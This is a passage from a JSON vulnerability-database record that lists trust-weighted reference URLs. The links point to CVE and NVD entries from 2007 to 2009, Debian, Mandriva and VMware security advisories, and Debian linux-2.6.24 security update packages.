        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1389"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1914"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.2,
        "url": "http://packages.debian.org/\u003cpkg\u003e"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1192"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1265"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1337"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1184"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1360"
      },
      {
        "trust": 0.2,
        "url": "http://www.mandriva.com/security/"
      },
      {
        "trust": 0.2,
        "url": "http://www.mandriva.com/en/security/kernelupdate"
      },
      {
        "trust": 0.2,
        "url": "http://www.mandriva.com/security/advisories"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1961"
      },
      {
        "trust": 0.1,
        "url": "http://sourceforge.net/project/shownotes.php?release_id=504022\u0026amp;group_id=42302"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/189.html"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=ea30e11970a96cfe5e32c03a29332554573b4a10"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/793-1/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1102"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1099"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1098"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0745"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5515"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2671"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1055"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0675"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2671"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0033"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1096"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2052"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-2315"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-2370"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2416"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1095"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2718"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1101"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1094"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1099"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2724"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5031"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0159"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3143"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1439"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2716"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-4864"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/download/download.do?downloadgroup=vc40u1"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1895"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3142"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3144"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2407"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2692"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2673"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1887"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2723"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0778"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2676"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1096"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1721"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2675"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1103"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1097"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0746"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1103"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2670"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0747"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1106"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1102"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2414"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4965"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0748"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0834"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1014842"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2847"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5461"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-4307"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1097"
      },
      {
        "trust": 0.1,
        "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1105"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3528"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2406"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2720"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2625"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2417"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/resources/techresources/726"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/lifecycle/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1232"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2670"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1106"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2722"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1094"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0781"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2698"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-6286"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0783"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1107"
      },
      {
        "trust": 0.1,
        "url": "https://hostupdate.vmware.com/software/vum/offline/release-155-20091116-013169/esxi-4.0.0-update01.zip"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/security_response.html"
      },
      {
        "trust": 0.1,
        "url": "https://hostupdate.vmware.com/software/vum/offline/release-158-20091118-187517/esx-4.0.0-update01.zip"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1101"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1104"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1252"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1100"
      },
      {
        "trust": 0.1,
        "url": "http://enigmail.mozdev.org/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0676"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0028"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0696"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1072"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1336"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1947"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5333"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1014886"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1104"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2721"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0269"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5342"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1098"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1388"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1107"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1100"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0002"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5700"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5966"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0580"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0322"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2672"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1095"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2719"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2625"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0787"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1105"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2848"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1895"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.8etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.8etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.8etch2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.8etch2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.8etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.8etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.8etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.8etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.8etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.8etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.8etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.8etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.8etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.8etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.8etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.8etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.8etch2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.8etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.8etch2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.8etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2407"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.8etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.8etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.8etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.8etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.8etch2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.8etch2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.8etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.8etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.8etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.8etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.8etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.8etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.8etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.8etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.8etch2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.8etch2.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.8etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.8etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.8etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.8etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.8etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.8etch2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.8etch2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.8etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_sparc.deb"
      },
      {
        "trust": 0.1,
